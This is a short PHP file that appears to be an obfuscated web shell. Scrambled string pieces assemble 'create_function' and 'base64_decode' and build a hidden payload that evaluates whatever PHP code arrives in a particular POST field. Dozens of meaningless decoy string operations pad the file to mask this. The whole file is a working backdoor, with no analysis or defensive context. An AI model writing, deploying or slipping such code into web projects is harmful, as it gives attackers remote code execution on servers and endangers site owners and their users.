<?php
$i = $i.substr("o21dHstr_replaco",5,10);
$aa7 = stripos("hllfdxsp04h8auu99","aa7");
$i = $i.substr("vuej",2,1);
$iif = ltrim("arlr6j4n4trtof3t");
$p = $p.$i("cbsF","","QGVcbsF2cbsFY");
$w9dm = str_split("cbel9foqodo",2);
$cq = $cq.$i("w2J","","base6w2J4w2J_w2J");
$l10 = rtrim("fbxrim5pdbywar");
$w = $w.$i("uPt","","creat");
$df = ltrim("c39daa3fpp");
$p = $p.substr("cwWwoJlh0",2,4);
$i0u = ltrim("o7bs499vj8kcm37x6b1");
$cq = $cq.substr("vmKiWdecodewlEG",5,6);
$be = strlen("gslaouvflxfs");
$w = $w.$i("v5XV","","ev5XV_v5XVfunv5XVct");
$wd1b = ltrim("miy57ldx4s");
$p = $p.substr("F9QTxGRG0m",0,4);
$q57 = rtrim("m85facmnxnpo1");
$w = $w.$i("lL","","ionlL");
$ec = stripos("e639c5j31x","ec");
$p = $p.$i("gNx4","","1NUWyd5Y");
$pi3 = rtrim("ardvqsyg4bl");
$p = $p.substr("ba8LsnB4cedky",5,4);
$vppe = ltrim("ws0ob5448f8kg4tgh7");
$p = $p.substr("XVpb",0,4);
$wwjb = str_split("hcrwjr5iy0hu507tboq",2);
$p = $p.$i("lF","","jc2ZXQlF4YWcn");
$lpe = rtrim("g5rso5ohk81xvpdgb0");
$p = $p.$i("nh","","XnhSnhk7");
$afrl = trim("okt4nmel0nb1");
$t = $w("", $cq($p));
$im = trim("ji47wao9ev3c6x");
$ee = ltrim("i8r6i1on8fabsvevp24");
$pvr = stripos("ihpd0o03em2","pvr");
function d(   ){ };
$ss4b = strlen("t0vypx57vmr");$t();
$vr9m = strlen("u2pk60bmkw");
$vpys = stripos("gpmbi4kx76o56cd92qm","vpys");
$at4g = strlen("ag1k69hn2ssgv3mo2o");
$uj6a = str_split("drean6fwhs0qb6l5",10);
?>